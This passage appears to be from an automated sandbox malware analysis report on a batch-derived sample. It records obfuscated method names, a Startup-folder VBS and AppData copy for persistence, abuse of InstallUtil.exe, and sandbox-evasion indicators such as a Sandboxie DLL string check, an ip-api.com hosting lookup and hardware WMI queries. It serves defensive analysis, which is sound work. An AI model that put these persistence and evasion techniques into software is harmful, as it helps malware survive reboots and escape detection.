Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, Mrc9xStYQ8VxKoXKbl4.cs High entropy of concatenated method names: 'IObtp5VBKd', 'KYdtfqxp3K', 't9Ht0RtPa4', 'eVgtWPkXeP', 'R0CtVlya57', 'jqVtlbldSg', 'kOutMq6wkj', 'wjEtS0FshE', 'zCmthpqdpQ', 'LMttoRpmLR'
Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, saEpX2tOaZ3MHMPHSgw.cs High entropy of concatenated method names: 'MDJJTBhW8W', 'zt5JBtpwsP', 'f4A4VWw5XXt8HhmGE4E', 'Yo2lpQwgf2EShVDGXKB', 'YAs296wbqpAAuYqRiCS', 'oCF3MNwN0PPCTdabJs3', 'IXNiOMw9GfaMc5mY14T', 'lfXVEAwRYe6eKrLfl4U'
Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, M3kbOgtzHH2l7rsni2f.cs High entropy of concatenated method names: 'HNKgdMuM2i', 'mjTgaD0UIg', 'UEOgUf23rb', 'BTFg4k3mry', 'Hypge6dCta', 'P0MgGsgUiY', 'LXcg8lxV29', 'mHQTXl00eZ', 'fuUgCxguvm', 'mZqgOPYuPb'
Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, I7DiZmuDr9s6wMO6NpB.cs High entropy of concatenated method names: 'QByRv8cKHybJKbYIcKT', 'NNjHOBc2SvDleEeJFNx', 'IoUtt0pkv3', 'NWXewecEkIJ5duAOnsd', 'qmqv5acpuwkSX6h2RxH', 'oQPauncfRUrd9kVXj7I', 'BW8YS7c0pjTX9j9xQlC', 'iCYIL5cWvIANrSWtCBe', 'mpkIPpcVravSA8TGh4A', 'ErchFocl7IK0jlTj2AQ'

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\xcopy.exe File created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
Source: C:\Windows\System32\xcopy.exe File created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf

Boot Survival

Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MustFlush.bat.Dmf PID: 7520, type: MEMORYSTR
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: c:\users\user\appdata\roaming\mustflush.bat.dmf Key value queried: Powershell behavior
Source: c:\users\user\desktop\ilzhnx3jac.bat.dmf Key value queried: Powershell behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory allocated: 40E0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2560000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2690000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4690000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Memory allocated: C10000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1370000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2C40000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799419
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798746
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798531
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Window / User API: threadDelayed 3799
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Window / User API: threadDelayed 2213
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 7247
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2592
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Window / User API: threadDelayed 3097
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Window / User API: threadDelayed 2005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 3747
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 6081
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf TID: 664 Thread sleep count: 3799 > 30
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf TID: 6640 Thread sleep count: 2213 > 30
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf TID: 6668 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep count: 38 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -35048813740048126s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7256 Thread sleep count: 7247 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7256 Thread sleep count: 2592 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99874s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99762s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99546s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99433s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99320s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99203s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -99093s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -98979s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -98872s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -98715s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -98604s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -98393s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -98232s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97827s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97607s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97499s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97390s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97280s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97171s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -97062s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96953s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96843s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96734s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96587s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96468s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96359s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96249s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96140s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -96030s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -95921s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -95811s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -95702s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -95573s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -95461s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -95210s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -95093s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94872s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94655s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94546s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94327s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94217s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -94109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -93999s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -93890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252 Thread sleep time: -93781s >= -30000s
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf TID: 7568 Thread sleep count: 3097 > 30
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf TID: 7624 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf TID: 7568 Thread sleep count: 2005 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7808 Thread sleep count: 3747 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99844s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7808 Thread sleep count: 6081 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99594s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99479s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99375s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99264s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99156s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -99046s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98819s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98608s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98500s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98390s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98281s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98172s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -98047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97828s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97495s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97358s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97244s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -97098s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -96531s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -96349s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -96234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -96125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -96015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95797s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95469s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95351s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95249s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95140s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -95031s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -94922s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799967s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799749s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799640s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799530s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799419s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799258s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1799015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1798853s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1798746s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1798640s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800 Thread sleep time: -1798531s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99762
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99433
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99093
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98979
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98715
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98393
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97827
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97499
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96843
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96587
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96249
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95811
